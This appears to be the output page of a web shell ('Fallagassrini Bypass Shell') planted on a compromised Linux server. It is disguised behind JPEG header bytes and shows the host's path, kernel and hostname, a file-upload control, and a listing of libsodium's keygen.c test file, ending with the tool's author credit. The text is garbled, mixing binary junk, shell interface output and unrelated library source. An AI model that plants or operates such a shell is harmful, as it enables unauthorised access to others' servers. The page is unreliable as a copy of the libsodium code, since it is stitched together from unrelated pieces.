JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /usr/share/doc/libsodium-devel-1.0.18/

Linux server.meentosys.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Upload File :
Current File : //usr/share/doc/libsodium-devel-1.0.18/keygen.c

#define TEST_NAME "keygen"
#include "cmptest.h"

typedef struct KeygenTV_ {
    void (*fn)(unsigned char *k);
    size_t key_len;
} KeygenTV;

static void
tv_keygen(void)
{
    static const KeygenTV tvs[] = {
        { crypto_auth_keygen, crypto_auth_KEYBYTES },
        { crypto_auth_hmacsha256_keygen, crypto_auth_hmacsha256_KEYBYTES },
        { crypto_aead_aes256gcm_keygen, crypto_aead_aes256gcm_KEYBYTES },
        { crypto_auth_hmacsha512_keygen, crypto_auth_hmacsha512_KEYBYTES },
        { crypto_auth_hmacsha512256_keygen, crypto_auth_hmacsha512256_KEYBYTES },
        { crypto_generichash_keygen, crypto_generichash_KEYBYTES },
        { crypto_generichash_blake2b_keygen, crypto_generichash_blake2b_KEYBYTES },
        { crypto_kdf_keygen, crypto_kdf_KEYBYTES },
        { crypto_onetimeauth_keygen, crypto_onetimeauth_KEYBYTES },
        { crypto_onetimeauth_poly1305_keygen, crypto_onetimeauth_poly1305_KEYBYTES },
        { crypto_aead_chacha20poly1305_ietf_keygen, crypto_aead_chacha20poly1305_ietf_KEYBYTES },
        { crypto_aead_chacha20poly1305_keygen, crypto_aead_chacha20poly1305_KEYBYTES },
        { crypto_aead_chacha20poly1305_ietf_keygen, crypto_aead_chacha20poly1305_ietf_KEYBYTES },
        { crypto_aead_xchacha20poly1305_ietf_keygen, crypto_aead_xchacha20poly1305_ietf_KEYBYTES },
        { crypto_secretbox_xsalsa20poly1305_keygen, crypto_secretbox_xsalsa20poly1305_KEYBYTES },
        { crypto_secretbox_keygen, crypto_secretbox_KEYBYTES },
        { crypto_secretstream_xchacha20poly1305_keygen, crypto_secretstream_xchacha20poly1305_KEYBYTES },
        { crypto_shorthash_keygen, crypto_shorthash_KEYBYTES },
        { crypto_stream_keygen, crypto_stream_KEYBYTES },
        { crypto_stream_chacha20_keygen, crypto_stream_chacha20_KEYBYTES },
        { crypto_stream_chacha20_ietf_keygen, crypto_stream_chacha20_ietf_KEYBYTES },
        { crypto_stream_salsa20_keygen, crypto_stream_salsa20_KEYBYTES },
        { crypto_stream_xsalsa20_keygen, crypto_stream_xsalsa20_KEYBYTES }
    };
    const KeygenTV *tv;
    unsigned char  *key;
    size_t          i;
    int             j;

    for (i = 0; i < (sizeof tvs) / (sizeof tvs[0]); i++) {
        tv = &tvs[i];
        key = (unsigned char *) sodium_malloc(tv->key_len);
        key[tv->key_len - 1U] = 0;
        for (j = 0; j < 10000; j++) {
            tv->fn(key);
            if (key[tv->key_len - 1U] != 0) {
                break;
            }
        }
        sodium_free(key);
        if (j >= 10000) {
            printf("Buffer underflow with test vector %u\n", (unsigned int) i);
        }
    }
    printf("tv_keygen: ok\n");
}

int
main(void)
{
    tv_keygen();

    return 0;
}

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net